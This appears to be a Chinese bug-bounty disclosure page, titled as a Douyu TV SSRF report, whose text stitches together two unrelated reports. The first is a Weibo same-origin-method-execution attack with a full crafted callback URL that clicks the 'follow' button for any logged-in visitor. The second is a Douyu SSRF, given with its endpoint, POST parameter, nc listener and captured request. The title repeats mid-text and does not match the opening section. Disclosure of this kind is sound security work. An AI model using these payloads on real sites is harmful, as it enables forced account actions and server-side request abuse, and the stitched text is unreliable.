斗鱼TV某处SSRF漏洞

微博一个some攻击的漏洞，只需点我的链接就可实现关注我等操作。漏洞资料可参考 http://www.benhayak.com/2015/06/same-origin-method-execution-some.html。我的例子在chrome下只要访问我的页面就中招，不用再点一次去绕过chrome的popup blocker

微博一个some攻击的漏洞，只需点我的链接就可实现关注我微博账号等操作

漏洞的url为

http://weibo.com/ajaxlogin.php?framelogin=1&callback=window.opener.method

callback参数虽然做了很多非法字符的限制，无法形成xss漏洞。但可以自定义字母和点符号

所以我可以使用同源方法调用的方式来执行Weibo.com域页面里的敏感操作，比如实现用户的关注按钮的点击

所以先打开一个页面，这是我的微博页面A

http://weibo.com/277634777

再打开我们的漏洞页面B

http://weibo.com/ajaxlogin.php?framelogin=1&callback=window.opener.document.body.firstElementChild.firstElementChild.firstElementChild.nextElementSibling.firstElementChild.firstElementChild.firstElementChild.firstElementChild.firstElementChild.firstElementChild.nextElementSibling.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.firstElementChild.firstElementChild.click

微博的登陆用户访问我构造的页面的话，就相当于利用页面B去点击了页面A中的关注按钮。就实现了对我的关注

我的例子在chrome下只要访问我的页面就中招，不用再点一次去绕过chrome的popup blocker

具体实现方式这里就先不写了……

可以见下面视频，在我访问了那个链接后，我就关注了一个陌生网友

斗鱼TV某处SSRF漏洞

看看有多少公司认为SSRF不算漏洞

#服务器

http://yuba.douyu.com

#SSRF地址

http://yuba.douyu.com/url/scrapy

# 参数, POST

url=http://www.baidu.com

nc -l -vv 8080

Connection from 119.90.48.56 port 8080 [tcp/webcache] accepted

GET /?123 HTTP/1.1

Host: 119.29.29.29:8080

Accept: */*

解决方案：

把用于取外网资源的API部署在不属于自己的机房

#FormatImgID_0#

解决方案：

做些白名单限制，或者写死函数